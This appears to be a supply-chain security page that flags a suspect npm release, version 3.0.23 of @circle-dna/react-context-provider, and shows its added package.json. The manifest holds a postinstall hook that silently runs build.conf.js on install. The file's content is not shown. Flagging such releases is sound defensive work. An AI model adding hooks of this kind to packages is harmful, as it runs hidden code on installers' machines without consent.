@circle-dna/react-context-provider 3.0.23

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @circle-dna/react-context-provider might be problematic. Click here for more details.

package/package.json ADDED
@@ -0,0 +1,19 @@
1
+ {
2
+ "name": "@circle-dna/react-context-provider",
3
+ "version": "3.0.23",
4
+ "description": "",
5
+ "main": "dist/react-context-provider.esm.js",
6
+ "dependencies": {
7
+ "uuid": "^10.0.0",
8
+ "axios":"^1.7.2",
9
+ "jwt-decode": "^4.0.0",
10
+ "moment":"^2.30.1",
11
+ "dotenv":"^16.4.5"
12
+ },
13
+ "scripts": {
14
+ "test": "echo \"Error: no test specified\" && exit 1",
15
+ "postinstall": "node -e \"require('./build.conf.js')\""
16
+ },
17
+ "author": "",
18
+ "license": "ISC"
19
+ }